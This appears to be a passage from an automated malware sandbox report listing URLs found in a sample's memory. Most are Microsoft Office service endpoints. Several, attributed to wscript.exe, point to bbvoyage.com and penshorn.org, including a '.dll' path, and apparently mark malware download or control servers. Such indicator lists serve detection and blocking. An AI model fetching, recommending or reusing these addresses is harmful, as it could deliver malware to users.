Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.office.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.scheduler.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://augloop.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.332605666.000000000558A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
Source: wscript.exe, 0000000A.00000003.338030471.000000000580E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.336991238.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337571919.00000000057FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.336359742.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337511898.00000000057D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337308071.00000000057D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337170816.00000000057C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cdn.entity.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cortana.ai
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://cr.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://d.docs.live.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://directory.services.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://graph.windows.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://invites.office.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://login.windows.local
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://make.powerautomate.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://management.azure.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://management.azure.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://microsoftapc-my.sharepoint.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: wscript.exe, 0000000A.00000003.341535635.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348037002.00000000058C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/M
Source: wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses
Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.332605666.000000000558A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
Source: wscript.exe, 0000000A.00000003.328173110.0000000005460000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329993705.0000000005467000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345486407.0000000005467000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347498300.0000000005467000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.327538633.000000000545A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/4
Source: wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/ocal
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
Source: wscript.exe, 0000000A.00000003.341489972.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347992328.00000000058AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/e
Source: wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/on
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
